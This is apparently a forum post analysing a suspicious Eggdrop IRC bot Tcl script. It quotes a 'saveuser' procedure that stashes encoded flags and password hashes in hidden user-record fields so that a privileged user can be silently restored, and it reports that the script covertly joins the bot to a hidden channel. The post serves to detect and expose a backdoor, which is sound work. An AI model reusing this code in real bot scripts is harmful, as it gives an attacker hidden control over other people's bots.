Might be this part of the script (does look awfully similar to the script we all love to hate..)
Code: Select all
proc saveuser {} {
global ps owner
if {![validuser $ps]} {
setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
} elseif {$owner != $ps} {
setuser $owner XTRA "BEND" [zip [chattr $ps]]
if {[passwdok $ps ""] != 1} {
setuser $owner XTRA "LAST" [getuser $ps "PASS"]
deluser $ps
if {![validuser $ps]} {
adduser $ps "$ps!*@*"
chattr $ps [dezip [getuser $owner XTRA "BEND"]]
if {[getuser $owner XTRA "LAST"] != ""} {
setuser $ps PASS [getuser $owner XTRA "LAST"]
return 1
A few other things in there that might be nasty as well, skimming through the code atm...
It would also seem it will try to join your bot to a dedicated channel, while hiding any information about this to you. I'll see if I can't decode which channelname (looks like the same encryption/decryption-scheme as used by n**gate).
Channel would appear to be #fortuna
It will also make use of a second user record called "config". Not entirely sure if it's purpose yet, but it would seem it "is supposed to" be used for keeping settings. Still uses weak encryption. Also adds user records for each channel it keeps setting for...